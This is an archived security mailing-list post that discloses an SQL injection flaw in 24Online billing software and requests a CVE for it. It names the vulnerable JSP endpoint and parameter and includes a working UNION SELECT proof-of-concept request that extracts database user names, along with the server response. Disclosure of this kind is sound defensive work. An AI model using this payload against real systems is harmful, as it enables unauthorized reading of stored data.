[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201607031017.u63AHTHM007349@sf01web3.securityfocus.com>
Date: Sun, 3 Jul 2016 10:17:29 GMT
From: rahullraz@...il.com
To: bugtraq@...urityfocus.com
Subject: [FD]CVE ID request : SQL injection in 24Online Client
Software name: 24 online
Version: 8.3.6 build 9.0
Vendor website: http://24onlinebilling.com
Potentially others versions older than this are vulnerable too.
Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The invoiceid GET parameter on <base url>/24online/webpages/myaccount/usersessionsummary.jsp in not filtered properly and leads to SQL Injection
Authentication Required: Yes
A non-privileged authenticated user can inject SQL commands on the <base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id> &fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss
There is complete informational disclosure over the stored database.
-----------------------------------
GET /24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=93043+UNION+ALL+SELECT+null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pg_user--+-&fromdt=06/05/2016%2019:37:44&todt=03/07/2016%2015:21:16 HTTP/1.1
Host: 10.100.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=5464B4DD2B003E1E73E34FF773CA7232; myaccountmenu_id=menu_5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 03 Jul 2016 09:59:41 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1
Powered by blists - more mailing lists